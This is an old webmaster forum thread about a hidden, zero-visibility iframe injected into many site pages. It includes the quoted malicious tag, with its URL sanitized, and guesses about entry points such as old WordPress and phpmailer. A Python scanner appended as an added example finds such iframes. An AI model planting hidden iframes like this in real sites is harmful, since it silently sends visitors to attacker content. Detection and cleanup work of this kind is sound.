Malicious Code in My Website

stumbled across this <iframe>

old_expat

4:19 am on Jul 5, 2007 (gmt 0)


I stumbled across this in one of my sites, then checked and found it in another:

<IFRAME name='StatPage' src='http://www.example.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

Then I found this link that warns about it:

[garryconn.com...]

Can someone explain how this gets into my pages, and how I can prevent it and others from happening again?

[edited by: physics at 7:22 pm (utc) on July 5, 2007]
[edit reason] Examplified a domain [/edit]

physics

7:24 pm on Jul 5, 2007 (gmt 0)


It looks like it's a WordPress hack. Looks like the solution is to upgrade to the newest version of WP.

old_expat

2:12 am on Jul 12, 2007 (gmt 0)


That's only one hack. None of my sites run on WordPress.

The code was in numerous Apache .html files as well.

overhaul

5:39 am on Jul 23, 2007 (gmt 0)


I found the root of the issue (possibly), see:

[wordpress.org...]
[garryconn.com...]

I am working on my WordPress installations, upgrade to 2.2.1. It looks like the issue was in phpmailer.

old_expat

7:15 am on Jul 23, 2007 (gmt 0)


It is possible that many people who have this on their pages don't know about it. In June, there was an estimate of 10,000 websites infected.

On a number of servers at my web host, the malicious code is still being discovered as of today.

I only ran across it on my site by accident.

If you want to know, look in your index.html page between </head> and <body> and see if you have an iframe.

If you do, you will probably find it in every index.htm page, in login.php, some includes and in a number of Apache *.html pages as well.

One suggestion is that Fedora 2 OS is vulnerable.
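
The manual check described in the post above (look for an iframe between </head> and <body>, then in every index, login, include and .html file) can be run over a whole web root. This is an added example, not code from the thread or from any poster; the extension list, the 10-pixel size cut-off and the sample pages are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)  # opening tag, any case
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SIZE_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?(\d+)", re.I)
GAP_RE = re.compile(r"</head\s*>(.*?)<body\b", re.I | re.S)  # text between the two tags
EXTENSIONS = (".html", ".htm", ".php", ".inc")  # assumed list of page types

def suspicious_iframes(text):
    """Return (tag, reasons) for each iframe that is hidden, tiny or misplaced."""
    gap = GAP_RE.search(text)
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag, reasons = m.group(0), []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden-style")
        sizes = [int(v) for v in SIZE_RE.findall(tag)]
        if sizes and max(sizes) <= 10:  # 10px cut-off is an assumption
            reasons.append("tiny")
        if gap and gap.start(1) <= m.start() < gap.end(1):
            reasons.append("between-head-and-body")
        if reasons:
            findings.append((tag, reasons))
    return findings

def scan_tree(root):
    """Walk a web root; map relative path -> findings for files that have any."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            found = suspicious_iframes(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                report[str(path.relative_to(root))] = found
    return report

# Constructed sample pages; the src is the thread's already-sanitized URL.
INFECTED = ("<html><head></head>\n<IFRAME name='StatPage' "
            "src='http://www.example.com/trf/traf.php' width=5 height=5 "
            "style='display:none'></IFRAME>\n<body><p>hi</p></body></html>")
CLEAN = "<html><head></head><body><iframe src='/map.html' width=600 height=400></iframe></body></html>"

def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, text in (("index.html", INFECTED), ("about.html", CLEAN)):
            Path(root, name).write_text(text, encoding="utf-8")
        return scan_tree(root)
```

A hit only shows which files were modified; it does not show how the tag was written there, so cleaned files can be re-infected until the entry point is closed.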

old_expat

5:47 am on Aug 2, 2007 (gmt 0)


BEWARE. I read this message today:

"Re. the IFRAME crap, my VPS provider was finally able to remove it after running the script 3 times over 3 days. Unfortunately by the 3rd day, Google had come by and now my site has a warning "this site may harm your computer". Wonderful."